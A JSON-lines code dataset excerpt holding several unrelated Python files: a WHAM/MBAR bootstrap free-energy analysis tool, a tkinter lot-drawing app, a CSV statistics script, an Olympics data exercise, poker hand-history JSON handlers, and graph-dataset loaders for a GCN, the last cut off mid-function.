parallelization (see options below)\n\n\n-----------------------------------------------------------------------------\nCommand-line options\n-----------------------------------------------------------------------------\n'''\n \n def __init__(self):\n super(WHAMmer,self).__init__()\n \n # Parallel processing by default (this is not actually necessary, but it is\n # informative!)\n self.wm_env.default_work_manager = self.wm_env.default_parallel_work_manager\n\n self.beta = 1\n\n self.n_bootstrap = None\n\n self.output_filename = None\n\n self.start_weights = None\n\n self.boot_fn = None\n \n self.data_extractor = None\n\n self.db = None\n self.n_bins = None\n\n # Total number of samples - sum of n_samples from each window\n @property\n def n_tot(self):\n return self.n_samples.sum()\n \n \n def add_args(self, parser):\n \n sgroup = parser.add_argument_group('(Binless) WHAM/MBAR error options')\n sgroup.add_argument('input', metavar='INPUT', type=str, nargs='+',\n help='Input file names')\n sgroup.add_argument('--fmt', type=str, choices=['phi', 'pmf', 'alc', 'chi', 'both'], default='phi',\n help='Format of input data files: \\'phi\\' for phiout.dat; \\ '\n '\\'pmf\\' for PMF type files (specify kappa (kJ/mol*nm2), rstar in header); \\ '\n '\\'alc\\' for alchemical type files (each column k gives biasing potential for this datapoint under kth window); \\ '\n '\\'both\\' for phi AND chi data (in pairs, phidat first)')\n sgroup.add_argument('--phisub', action='store_true',\n help='If true, expect two phiout files per window (main volume and subvol, resp.)')\n sgroup.add_argument('--auxfiles', metavar='AUXINPUT', type=str, nargs='+',\n help='(Optional): Aux data file names, same number of data points as inputs')\n sgroup.add_argument('-b', '--start', type=int, default=0,\n help='first timepoint (in ps) - default is first available time point') \n sgroup.add_argument('-e', '--end', type=int, default=None,\n help='last timepoint (in ps) - default is last available time point')\n sgroup.add_argument('--skip', type=int, default=None,\n help='Skip this many picoseconds from each dataset. --autocorr option WILL BE IGNORED if this option is used')\n sgroup.add_argument('-T', metavar='TEMP', type=float,\n help='convert Phi values to kT, for TEMP (K)')\n sgroup.add_argument('--start-weights', type=str,\n help='Starting weights, if known')\n sgroup.add_argument('--bootstrap', type=int, default=1000,\n help='Number of bootstrap samples to perform') \n sgroup.add_argument('--autocorr', '-ac', type=float, help='Autocorrelation time (in ps); this can be \\ '\n 'a single float, or one for each window') \n sgroup.add_argument('--autocorr-file', '-af', type=str, \n help='Name of autocorr file (with times in ps for each window), if previously calculated')\n sgroup.add_argument('--n-bins', type=int, default=201, help='number of bins, if plotting prob dist (default 25)')\n sgroup.add_argument('--db', type=float, default=1.0, help='bin width, for KL tests')\n sgroup.add_argument('--start-weights', type=str, default=None,\n help='(optional) previously calculated f_k file for INDUS simulations - \\ '\n 'if \\'phi\\' format option also supplied, this will calculate the Pv(N) (and Ntwid). \\ '\n 'For \\'xvg\\' formats, this will calculate the probability distribution of whatever \\ '\n 'variable has been umbrella sampled')\n sgroup.add_argument('--boot-fn', default=None, \n help='function, loaded from file of the form \\'module.function\\', to be performed \\ '\n 'during each bootstrap iteration. If provided, the function is called during each bootstrap as: \\ '\n 'fn(all_data, all_data_N, boot_indices, boot_logweights) where boot_indices corresponds to the indices\\ '\n 'of this selected bootstrap sample, and boot_logweights are the corresponding (log of) statistical weights \\ '\n 'for each bootstrap sample calculated with WHAM/MBAR.')\n\n ## Hackish way to 'inheret' attributes from the data extractor\n def __getattr__(self, attr):\n if self.data_extractor is not None:\n return getattr(self.data_extractor, attr)\n\n def process_args(self, args):\n\n self.beta = 1\n if args.T:\n self.beta /= (args.T * k)\n\n self.db = args.db\n self.n_bins = args.n_bins\n\n # Number of bootstrap samples to perform\n self.n_bootstrap = args.bootstrap\n\n if args.start_weights:\n self.start_weights = np.loadtxt(args.start_weights)\n log.info(\"starting weights: {}\".format(self.start_weights))\n\n if args.autocorr_file is not None:\n auto = args.autocorr_file\n else:\n auto = args.autocorr\n\n\n\n if args.auxfiles is not None:\n auxfiles = args.auxfiles\n else:\n auxfiles = None\n\n log.info(\"Extracting data...\")\n #embed()\n if args.fmt != 'both':\n self.data_extractor = WHAMDataExtractor(np.sort(args.input), auxinfiles=auxfiles, fmt=args.fmt, phisub=args.phisub, start=args.start, end=args.end, beta=self.beta)\n\n else:\n log.info(\"Extracting pairs of phi, chi data!!!\")\n log.info(\"WARNING: bootstrapping analysis is not yet implemented for 2D. Also, this may take a *long* time.\")\n self.data_extractor = WHAMDataExtractor(np.sort(args.input)[::2], auxinfiles=auxfiles, fmt='phi', phisub=args.phisub, start=args.start, end=args.end, beta=self.beta)\n chi_data_extractor = WHAMDataExtractor(np.sort(args.input)[1::2], fmt='chi', start=args.start, end=args.end, beta=self.beta)\n\n self.data_extractor.bias_mat += chi_data_extractor.bias_mat\n\n self.n_bootstrap = 0\n\n self.data_extractor.all_data = np.stack((self.data_extractor.all_data, chi_data_extractor.all_data)).T\n if auto is not None:\n min_idx = self.autocorr < auto\n self.autocorr[min_idx] = auto\n\n log.info(\"Tau for each window: {} ps\".format(self.autocorr))\n log.info(\"data time step: {} ps\".format(self.ts))\n log.info(\"autocorr nsteps: {}\".format(self.autocorr_blocks)) \n\n if args.boot_fn is not None:\n self.boot_fn = get_object(args.boot_fn)\n\n def go(self):\n #embed()\n if self.start_weights is not None:\n log.info(\"using initial weights: {}\".format(self.start_weights))\n f_k_sub = self.start_weights\n else:\n xweights = np.zeros(self.n_windows)\n\n assert xweights[0] == 0\n\n log.info(\"Quick sub-sampled MBAR run\")\n \n # Only grab n_uncorr_samples samples from each window for a quick WHAM run to get an initial guess\n # for weights {f_k}\n uncorr_bias_mat, subsampled_indices = _subsample_small(self.bias_mat, self.uncorr_n_samples, self.uncorr_n_tot, self.n_samples, self.n_windows)\n \n #myargs = (uncorr_bias_mat, self.uncorr_n_sample_diag, self.uncorr_ones_m, self.uncorr_ones_n, self.uncorr_n_tot)\n myargs = (uncorr_bias_mat, self.uncorr_n_samples / self.uncorr_n_tot, self.uncorr_n_tot)\n f_k_sub = minimize(eval_fn, xweights[1:], method='BFGS', args=myargs, jac=True).x\n #f_k_sub = minimize(kappa, xweights[1:], method='L-BFGS-B', args=myargs, jac=grad_kappa).x\n f_k_sub = np.append(0, f_k_sub)\n log.info(\"subsampled MBAR results: {}\".format(f_k_sub))\n\n log.info(\"Running MBAR on entire dataset\")\n log.info(\"...(this might take awhile)\")\n myargs = (self.bias_mat, self.n_samples / self.n_tot, self.n_tot)\n \n f_k_actual = minimize(eval_fn, f_k_sub[1:], method='BFGS', tol=1e-5, args=myargs, jac=True, callback=callbackF).x\n #f_k_actual = minimize(kappa, f_k_sub[1:], method='L-BFGS-B', args=myargs, jac=grad_kappa, callback=callbackF).x\n f_k_actual = np.append(0, f_k_actual)\n log.info(\"MBAR results on entire dataset: {}\".format(f_k_actual))\n\n np.savetxt('f_k_all.dat', f_k_actual, fmt='%3.6f')\n\n \n # Log of each datapoint's statistical weight. Note this accounts for statistical inefficiency in samples\n all_logweights = gen_data_logweights(self.bias_mat, f_k_actual, self.n_samples, self.ones_m, self.ones_n)\n \n \n np.savez_compressed('all_data.dat', logweights=all_logweights, data=self.all_data, data_aux=self.all_data_aux, bias_mat=self.bias_mat, n_samples=self.n_samples)\n #embed()\n # Now for bootstrapping...\n n_workers = self.work_manager.n_workers or 1\n #batch_size = self.n_bootstrap // n_workers\n batch_size = 1\n if self.n_bootstrap % n_workers != 0:\n batch_size += 1\n log.info(\"batch size for bootstrap: {}\".format(batch_size))\n\n # the bootstrap estimates of free energies wrt window i=0\n f_k_boot = np.zeros((self.n_bootstrap, self.n_windows), dtype=np.float32)\n boot_indices = np.zeros((self.n_bootstrap, (self.autocorr_blocks*self.uncorr_n_samples).sum()), dtype=int)\n # Results of hook function, if desired\n boot_res = np.zeros(self.n_bootstrap, dtype=object)\n\n def task_gen():\n \n if __debug__:\n checkset = set()\n for lb in range(0, self.n_bootstrap, batch_size):\n ub = min(self.n_bootstrap, lb+batch_size)\n \n if __debug__:\n checkset.update(set(range(lb,ub)))\n\n args = ()\n kwargs = dict(lb=lb, ub=ub, bias_mat=self.bias_mat, uncorr_n_samples=self.uncorr_n_samples, \n autocorr_blocks=self.autocorr_blocks, n_samples=self.n_samples, ones_m=self.ones_m,\n ones_n=self.ones_n,xweights=f_k_actual[1:], all_data=self.all_data,\n all_data_aux=self.all_data_aux, boot_fn=self.boot_fn)\n log.info(\"Sending job batch (from bootstrap sample {} to {})\".format(lb, ub))\n yield (_bootstrap, args, kwargs)\n\n\n log.info(\"Beginning {} bootstrap iterations\".format(self.n_bootstrap))\n # Splice together results into final array of densities\n for future in self.work_manager.submit_as_completed(task_gen(), queue_size=self.max_queue_len):\n f_k_slice, boot_res_slice, this_boot_indices, lb, ub = future.get_result(discard=True)\n log.info(\"Receiving result\")\n f_k_boot[lb:ub, :] = f_k_slice\n log.debug(\"this boot weights: {}\".format(f_k_slice))\n boot_res[lb:ub] = boot_res_slice\n boot_indices[lb:ub, :] = this_boot_indices\n del f_k_slice\n\n # Get SE from bootstrapped samples\n f_k_boot_mean = f_k_boot.mean(axis=0)\n f_k_se = np.sqrt(f_k_boot.var(axis=0))\n print('f_k (boot mean): {}'.format(f_k_boot_mean))\n print('f_k: {}'.format(f_k_actual))\n print('se: {}'.format(f_k_se))\n np.savetxt('err_f_k.dat', f_k_se, fmt='%3.6f')\n np.savetxt('boot_f_k.dat', f_k_boot)\n np.save('boot_indices.dat', boot_indices)\n\n print(\"saving bootstrap fn output...\")\n if self.boot_fn is not None:\n np.save('boot_fn_payload.dat', boot_res)\n\n log.info(\"Performing cross-entropy post-analysis\")\n print(\"...Done.\")\n \n bins = np.arange(np.floor(self.all_data.min()), np.ceil(self.all_data.max())+self.db, self.db)\n #bins = np.linspace(np.floor(self.all_data.min()), np.ceil(self.all_data.max()), self.n_bins)\n #embed()\n entropies = np.zeros(self.n_windows)\n\n fvn = get_negloghist(self.all_data, bins, all_logweights)\n mask = ~np.ma.masked_invalid(fvn).mask\n \n if self.fmt == 'phi': #or self.fmt == 'alc':\n\n for i, (data_slice, bias_slice) in enumerate(self.data_extractor.gen_obs_data()):\n #embed()\n this_n_sample = self.n_samples[i]\n obs_hist, _ = np.histogram(data_slice, bins=bins)\n occ = obs_hist > 0\n this_mask = mask&occ\n\n if self.fmt == 'phi':\n this_kappa = self.kappas[i]\n this_nstar = self.Nstars[i]\n this_phi = self.phis[i]\n\n # Get consensus hist for this window\n bias_logweights = all_logweights - 0.5*self.beta*this_kappa*(self.all_data - this_nstar)**2 - this_phi*self.all_data\n \n elif self.fmt == 'alc':\n bias_logweights = all_logweights - bias_slice\n\n bias_logweights -= bias_logweights.min()\n fvn_bias = get_negloghist(self.all_data, bins, bias_logweights)\n\n this_eta = (obs_hist / this_n_sample) * (np.log(obs_hist / this_n_sample) + fvn_bias)\n\n entropies[i] = this_eta[this_mask].sum()\n\n print(\"{}th window consensus: {:.2e}\".format(i, this_eta[this_mask].sum()))\n\n np.savetxt('kl_entropies.dat', np.dstack((self.kappas, self.Nstars, self.phis, entropies))[0], header='kappa(kJ/mol) Nstar phi(kJ/mol) KL_div')\n\n \n bins = np.arange(self.all_data_aux.max()+2)\n fvn = get_negloghist(self.all_data_aux, bins, all_logweights)\n mask = ~np.ma.masked_invalid(fvn).mask\n wt = np.exp(-fvn[mask])\n wt /= wt.sum()\n avg_n = np.dot(wt, bins[:-1][mask])\n avg_n_sq = np.dot(wt, bins[:-1][mask]**2)\n var_n = avg_n_sq - avg_n**2\n\n np.savetxt(\"fvn.dat\", np.stack((bins[:-1], fvn)).T, header='N beta Fv(N) : {:.2f} : {:.4f}'.format(avg_n, var_n), fmt='%f')\n\n\n elif self.fmt == 'alc':\n np.savetxt(\"fvn.dat\", np.stack((bins[:-1], fvn)).T)\n cum_n_samples = np.append(0, np.cumsum(self.n_samples))\n for i in range(self.n_windows):\n #embed()\n start_idx = cum_n_samples[i]\n end_idx = cum_n_samples[i+1]\n\n data_slice = self.all_data[start_idx:end_idx]\n this_n_sample = self.n_samples[i]\n obs_hist, _ = np.histogram(data_slice, bins=bins)\n occ = obs_hist > 0\n this_mask = mask&occ\n\n bias_logweights = all_logweights - self.bias_mat[:, i]\n\n bias_logweights -= bias_logweights.min()\n fvn_bias = get_negloghist(self.all_data, bins, bias_logweights)\n\n this_eta = (obs_hist / this_n_sample) * (np.log(obs_hist / this_n_sample) + fvn_bias)\n\n entropies[i] = this_eta[this_mask].sum()\n\n print(\"{}th window consensus: {:.2e}\".format(i, this_eta[this_mask].sum()))\n\n\n\nif __name__=='__main__':\n WHAMmer().main()\n\n\n \n","sub_path":"whamerr.py","file_name":"whamerr.py","file_ext":"py","file_size_in_byte":21675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"90247582","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom random import *\nfrom tkinter import filedialog\nfrom tkinter.filedialog import asksaveasfile\nimport copy\nre_get=0\ni=0\ngot_i=0\nroot=Tk()\nroot.iconbitmap(r'C:\\Users\\rina\\Downloads\\randomprogram--main\\tennoji.ico')\nlistbox=Listbox(root,selectmode=EXTENDED)\nlistbox_yougot=Listbox(root,selectmode=EXTENDED)\nroot.title(\"Rinachan Lots\")\nroot.geometry(\"700x700\")\nroot.resizable(0,0)\nkeys={}\nyougots={}\ndef download():\n if len(keys)==0:\n messagebox.showwarning(\"error!\", \"please input value more than 1.\")\n return\n f = asksaveasfile(mode='w', defaultextension=\".txt\")\n if f is None: # asksaveasfile return `None` if dialog closed with \"cancel\".\n return\n k_keys=[]\n for kk in keys.keys():\n k_keys.append(int(kk))\n for i in range(len(k_keys)):\n text2save = keys[k_keys[i]]+'\\n'\n f.write(text2save)\n f.close()\ndef openfile():\n filename = filedialog.askopenfilename()\n\n fileHandle = open(filename, 'r')\n getFromFile=(fileHandle.read()).split('\\n')\n global i\n for j in range(len(getFromFile)):\n print(getFromFile[j])\n print(i)\n if(getFromFile[j]==''):\n continue\n newArray = []\n for z in keys.keys():\n newArray.append(int(z))\n newArray.sort()\n print(newArray)\n if i in newArray:\n i = 0\n for k in newArray:\n if (i == int(k)):\n i += 1\n elif (i != int(k)):\n break\n print(i)\n keys[i] = getFromFile[j]\n listbox.insert(i, getFromFile[j])\n input_box.delete(\"0\", END)\n i += 1\n print(keys)\n\n fileHandle.close()\ndef random_select():\n if int(len(keys))==0:\n messagebox.showwarning(\"error!\", \"please input value more than 1.\")\n return\n global i\n check_value=[]\n for keysss in keys.keys():\n check_value.append(int(keysss))\n print(check_value)\n keys_value=check_value[randrange(0,len(check_value))]\n print(keys_value)\n newArray=[]\n global got_i\n for j in yougots.keys():\n newArray.append(int(j))\n if got_i in newArray:\n got_i=0\n print(\"hi\")\n for k in newArray:\n if(got_i==int(k)):\n got_i+=1\n elif(got_i!=int(k)):\n break\n global re_get\n re_get=check_value\n yougots[got_i]=keys[keys_value]\n listbox_yougot.insert(got_i,yougots[got_i])\n messagebox.showinfo(\"What You Get!\", keys[keys_value])\n var.set(f\"What You Got: {keys[keys_value]}\")\n got_i+=1\n print(keys.keys())\n print(1)\n\ndef delete_all():\n if int(len(keys))==0:\n messagebox.showwarning(\"error!\", \"lot box is empty!.\")\n return\n listbox.delete(0,END)\n global i\n i=0\n keys.clear()\ndef delete_button():\n try:\n selected = listbox.get(listbox.curselection())\n print(selected)\n global i\n i=i-1\n for key,value in keys.items():\n if value==selected:\n key_find=key\n del keys[key_find]\n listbox.delete(ANCHOR)\n except:\n return\n\ndef insert_fun(event):\n if(Entry.get(input_box)==\"\"):\n messagebox.showwarning(\"error!\",\"please input value\")\n return\n global i\n newArray=[]\n for j in keys.keys():\n newArray.append(int(j))\n newArray.sort()\n if i in newArray:\n print(\"3\")\n i=0\n for k in newArray:\n if(i==int(k)):\n\n i+=1\n elif(i!=int(k)):\n break\n\n keys[i]=Entry.get(input_box)\n listbox.insert( i,Entry.get(input_box))\n i = i + 1\n input_box.delete(\"0\",END)\n print(keys)\n\ninput_box = Entry(root, width=28)\nfileUpload_Button=Button(width=10,text=\"upload lots\",command=openfile)\nfileDownload_Button=Button(width=10,text=\"download lots\",command=download)\ndelete=Button(width=10,text=\"delete this\",command=delete_button)\ndelete.place(x=50,y=625)\nfileUpload_Button.place(x=160,y=650)\ndelete_all=Button(width=10,text=\"delete All\",command=delete_all)\nfileDownload_Button.place(x=50,y=650)\ndelete_all.place(x=160,y=625)\ninput_box.place(x=255,y=20)\nrandom=Button(width=10,text=\"Drawing Lots\",command=random_select)\nrandom.place(x=300,y=60)\nlistbox.place(x=50, y=100, width=200, height=500)\nlistbox_yougot.place(x=450,y=100,width=200,height=500)\nvar=StringVar()\nText_Slot=Label(root,textvariable=var,font=('Arial',10))\nText_Slot2=Label(root,text=\"Type and press enter!\",font=('Arial',10))\ndef delete_got():\n try:\n selected = listbox_yougot.get(listbox_yougot.curselection())\n print(selected)\n global got_i\n got_i=got_i-1\n for key,value in yougots.items():\n if value==selected:\n key_find=key\n del yougots[key_find]\n listbox_yougot.delete(ANCHOR)\n print(yougots.keys())\n except:\n return\n\ndelete_got=Button(width=10,text=\"delete this lot\",command=delete_got)\ndelete_got.place(x=450,y=625)\n\ndef delete_all_got():\n if int(len(yougots))==0:\n messagebox.showwarning(\"error!\", \"Drawing First!\")\n return\n listbox_yougot.delete(0,END)\n global got_i\n got_i=0\n yougots.clear()\ndelete_all_got=Button(width=10,text=\"delete all\",command=delete_all_got)\ndelete_all_got.place(x=570,y=625)\n\ndef download_yougot():\n if len(yougots) == 0:\n messagebox.showwarning(\"error!\", \"please draw!\")\n f = asksaveasfile(mode='w', defaultextension=\".txt\")\n if f is None: # asksaveasfile return `None` if dialog closed with \"cancel\".\n return\n got_kk=[]\n for c in yougots.keys():\n got_kk.append(int(c))\n for i in range(len(yougots)):\n text2save = yougots[got_kk[i]]+'\\n'\n f.write(text2save)\n f.close()\ndownload_got=Button(width=27,text=\"download those\",command=download_yougot)\ndownload_got.place(x=450,y=650)\nroot.bind('', insert_fun)\n\ndef swap_button():\n if len(yougots)==0:\n messagebox.showwarning(\"error!\", \"Drawing First!\")\n return\n\n global keys\n keys.clear()\n keys=copy.deepcopy(yougots)\n listbox.delete(0, END)\n global i\n i=0\n for k in range(len(yougots)):\n listbox.insert(k, keys[k])\n i=i+1\n\n\n\n\nswap_button=Button(width=15,text=\"<-move to lots\",command=swap_button)\nswap_button.place(x=280,y=265)\n\ndef swap_button2():\n if len(keys)==0:\n messagebox.showwarning(\"error!\", \"Input First!\")\n return\n global yougots\n yougots.clear()\n yougots = copy.deepcopy(keys)\n listbox_yougot.delete(0, END)\n global i\n i = 0\n for k in range(len(keys)):\n listbox_yougot.insert(k, yougots[k])\n i = i + 1\n\nswap_button=Button(width=15,text=\"move to lots->\",command=swap_button2)\nswap_button.place(x=280,y=300)\nText_Slot2.place(x=10,y=20)\nText_Slot.place(x=450,y=65)\nroot.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"140058494","text":"import csv\r\nfrom collections import Counter \r\n\r\nwith open(\"height-weight.csv\", newline=\"\")as f :\r\n reader = csv.reader(f)\r\n file_data = list(reader)\r\n\r\nfile_data.pop(0)\r\n\r\nheight_list = []\r\n\r\nfor i in range(len(file_data)):\r\n num = file_data[i][1]\r\n height_list.append(float(num)) \r\n\r\nn = len(height_list)\r\nheight_list.sort()\r\n\r\ntotal = 0\r\n\r\nfor x in height_list:\r\n total = total + x\r\n\r\nmean = total/n\r\n\r\nprint(mean)\r\n\r\nif n%2 == 0:\r\n median1 = float(height_list[n//2])\r\n median2 = float(height_list[n//2-1])\r\n median = (median1 + median2)/2\r\nelse:\r\n median = float(height_list[n//2]) \r\n\r\nprint(median) \r\n\r\nnewdata = Counter(height_list)\r\n\r\ndata_range = {\r\n \"50-60\": 0,\r\n \"60-70\": 0,\r\n \"70-80\": 0,\r\n}\r\n\r\nfor height, occurance in newdata.items():\r\n if 50 modeOccurance:\r\n modeRandge, modeOccurance = [int(range.split(\"-\")[0]), int(range.split(\"-\")[1])], occurance\r\n\r\nmode = float((modeRandge[0] + modeRandge[1]) //2)\r\n\r\nprint(mode)","sub_path":"workingwithcsv.py","file_name":"workingwithcsv.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"602524680","text":"# %load q02_country_operations/build.py\n# default imports\nfrom greyatomlib.olympics_project_new.q01_rename_columns.build import q01_rename_columns\n#Previous Functions\npath = './data/olympics.csv'\nOlympicsDF=q01_rename_columns(path) \ndef q02_country_operations(OlympicsDF=OlympicsDF):\n newcolumlist = [ (str(x)).split('(',1)[0].replace(u'\\xa0', u'') for x in OlympicsDF['Country']]\n OlympicsDF['Country_Name']=newcolumlist\n return OlympicsDF\nq02_country_operations()\n\n\n\n","sub_path":"q02_country_operations/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"87722727","text":"import jsonpickle\nfrom jsonpickle.handlers import BaseHandler\n\nfrom poker import Card, Combo\nfrom poker.handhistory import _BaseStreet, _BaseHandHistory, _Player, _PlayerAction\n\n\n@jsonpickle.handlers.register(Card, base=True)\nclass CardHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data = {'rank': obj.rank.val, 'suit': obj.suit.name}\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\n@jsonpickle.handlers.register(Combo, base=True)\nclass ComboHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data = {'1': self.context.flatten(obj.first, reset=False), '2': self.context.flatten(obj.second, reset=False)}\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\n@jsonpickle.handlers.register(_Player, base=True)\nclass PlayerHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data.clear()\n data = {'name': obj.name, 'stack': float(obj.stack), 'seat': obj.seat}\n if obj.combo is not None:\n data['hand'] = self.context.flatten(obj.combo, reset=False)\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\n@jsonpickle.handlers.register(_PlayerAction, base=True)\nclass PlayerActionsHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data = {}\n data['name'] = obj.name\n data['action'] = obj.action.name\n if obj.amount is not None:\n data['amount'] = float(obj.amount)\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\n@jsonpickle.handlers.register(_BaseStreet, base=True)\nclass StreetHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data = {}\n if obj.actions is not None:\n data['actions'] = [self.context.flatten(action, reset=False) for action in obj.actions]\n if obj.cards is not None:\n data['cards'] = [self.context.flatten(x, reset=False) for x in obj.cards]\n data['flushdraw'] = obj.has_flushdraw\n data['gutshot'] = obj.has_gutshot\n data['paired'] = obj.has_pair\n data['straightdraw'] = obj.has_straightdraw\n data['monotone'] = obj.is_monotone\n data['triplet'] = obj.is_triplet\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\n@jsonpickle.handlers.register(_BaseHandHistory, base=True)\nclass HandHistoryHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data = {}\n data['timestamp'] = str(obj.date)\n data['id'] = int(obj.ident)\n data['tablename'] = obj.table_name\n data['bb'] = float(obj.bb)\n data['sb'] = float(obj.sb)\n data['game'] = str(obj.game)\n data['gametype'] = str(obj.game_type)\n data['limit'] = str(obj.limit)\n data['max-players'] = obj.max_players\n data['hero'] = obj.hero.name\n data['button'] = obj.button.name\n if obj.total_pot is not None:\n data['total_pot'] = float(obj.total_pot)\n if obj.rake is not None:\n data['rake'] = float(obj.rake)\n if obj.tournament_ident is not None:\n data['tournament-id'] = int(obj.tournament_ident)\n if obj.tournament_level is not None:\n data['tournament-level'] = str(obj.tournament_level)\n if obj.currency is not None:\n data['currency'] = str(obj.currency)\n if obj.extra is not None and obj.extra.get('money_type') is not None:\n data['moneytype'] = str(obj.extra.get('money_type'))\n data['players'] = [self.context.flatten(player, reset=True) for player in obj.players]\n\n if obj.preflop is not None:\n preflop_actions = [self.context.flatten(action, reset=False) for action in obj.preflop.actions]\n data['preflop'] = {'actions': preflop_actions}\n\n if obj.flop is not None:\n data['flop'] = self.context.flatten(obj.flop, reset=True)\n\n if obj.turn is not None:\n data['turn'] = self.context.flatten(obj.turn, reset=True)\n\n if obj.river is not None:\n data['river'] = self.context.flatten(obj.river, reset=True)\n\n if obj.show_down is not None:\n data['show_down'] = self.context.flatten(obj.show_down, reset=True)\n\n if obj.board is not None:\n board_ = [self.context.flatten(card, reset=True) for card in obj.board]\n data['board'] = board_\n data['winners'] = obj.winners\n\n if obj.earnings is not None:\n data['earnings'] = float(obj.earnings)\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\nclass JsonEncoder:\n\n def encode(self, obj):\n return jsonpickle.encode(obj)\n","sub_path":"poker/jsonencoding.py","file_name":"jsonencoding.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105094550","text":"import numpy as np\nimport pickle as pkl\nimport networkx as nx\nimport scipy.sparse as sp\nfrom scipy.sparse.linalg.eigen.arpack import eigsh\nfrom sklearn import preprocessing\nimport sys\nimport os\nimport gc\nimport math\n\ndef parse_index_file(filename):\n \"\"\"Parse index file.\"\"\"\n index = []\n for line in open(filename):\n index.append(int(line.strip()))\n return index\n\n\ndef sample_mask(idx, l):\n \"\"\"Create mask.\"\"\"\n mask = np.zeros(l)\n mask[idx] = 1\n return np.array(mask, dtype=np.bool)\n\ndef save_sparse_csr(filename,array):\n np.savez(filename,data = array.data ,indices=array.indices,\n indptr =array.indptr, shape=array.shape )\n\ndef load_sparse_csr(filename):\n loader = np.load(filename)\n return sp.csr_matrix(( loader['data'], loader['indices'], loader['indptr']),\n shape = loader['shape'])\n\ndef encode_onehot(labels):\n classes = set(labels)\n classes_dict = {c: np.identity(len(classes))[i, :] for i, c in enumerate(classes)}\n labels_onehot = np.array(list(map(classes_dict.get, labels)), dtype=np.int32)\n return labels_onehot\n\ndef load_data2(dataset_str):\n \"\"\"Load citation network dataset (cora only for now)\"\"\"\n print('Loading {} dataset...'.format(dataset_str))\n path = \"data/\"\n idx_features = np.genfromtxt(\"{}{}.content\".format(path, dataset_str), dtype=np.dtype(str))\n features = sp.csr_matrix(idx_features, dtype=np.float32)\n #features = sp.vstack((allx, tx)).tolil()\n #features[test_idx_reorder, :] = features[test_idx_range, :]\n\n idx_labels = np.genfromtxt(\"{}{}.labels\".format(path, dataset_str), dtype=np.dtype(str))\n labels = encode_onehot(idx_labels)\n\n # build graph\n idx2=list(range(1,1019))\n idx = np.array(idx2, dtype=np.int32)\n print(idx.shape)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset_str), dtype=np.int32)\n a=list(map(idx_map.get, edges_unordered.flatten()))\n file=open('data.txt','w') \n file.write(str(a)); \n file.close() \n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),shape=(labels.shape[0], labels.shape[0]), dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n print('Dataset has {} nodes, {} edges, {} features.'.format(adj.shape[0], edges.shape[0], features.shape[1]))\n\n return features.todense(), adj, labels\n\ndef get_splits(y):\n idx_train = range(70)\t#0,1,2,...,139\n idx_val = range(100, 250)\t#200,201,...,499\n idx_test = range(250, 750)\t#500,501,...,1499\n y_train = np.zeros(y.shape, dtype=np.int32)\n y_val = np.zeros(y.shape, dtype=np.int32)\n y_test = np.zeros(y.shape, dtype=np.int32)\n y_train[idx_train] = y[idx_train]\n y_val[idx_val] = y[idx_val]\n y_test[idx_test] = y[idx_test]\n train_mask = sample_mask(idx_train, y.shape[0])\n val_mask = sample_mask(idx_val, y.shape[0])\n test_mask = sample_mask(idx_test, y.shape[0])\n return y_train, y_val, y_test, idx_train, idx_val, idx_test, train_mask, val_mask, test_mask\n\ndef load_data(dataset_str):\n \"\"\"Load data.\"\"\"\n names = ['x', 'y', 'tx', 'ty', 'allx', 'ally', 'graph']\n objects = []\n for i in range(len(names)):\n with open(\"data/ind.{}.{}\".format(dataset_str, names[i]), 'rb') as f:\n if sys.version_info > (3, 0):\n objects.append(pkl.load(f, encoding='latin1'))\n else:\n objects.append(pkl.load(f))\n\n x, y, tx, ty, allx, ally, graph = tuple(objects)\n print(\"graph is....\")\n print(type(graph))\n print(\"allx is....\")\n print(type(allx))#\n test_idx_reorder = parse_index_file(\"data/ind.{}.test.index\".format(dataset_str))\n test_idx_range = np.sort(test_idx_reorder)\n\n if dataset_str == 'citeseer':\n # Fix citeseer dataset (there are some isolated nodes in the graph)\n # Find isolated nodes, add them as zero-vecs into the right position\n test_idx_range_full = range(min(test_idx_reorder), max(test_idx_reorder)+1)\n tx_extended = sp.lil_matrix((len(test_idx_range_full), x.shape[1]))\n tx_extended[test_idx_range-min(test_idx_range), :] = tx\n tx = tx_extended\n ty_extended = np.zeros((len(test_idx_range_full), y.shape[1]))\n ty_extended[test_idx_range-min(test_idx_range), :] = ty\n ty = ty_extended\n\n if dataset_str == 'nell.0.001':\n # Find relation nodes, add them as zero-vecs into the right position\n test_idx_range_full = range(allx.shape[0], len(graph))\n isolated_node_idx = np.setdiff1d(test_idx_range_full, test_idx_reorder)\n tx_extended = sp.lil_matrix((len(test_idx_range_full), x.shape[1]))\n tx_extended[test_idx_range-allx.shape[0], :] = tx\n tx = tx_extended\n ty_extended = np.zeros((len(test_idx_range_full), y.shape[1]))\n 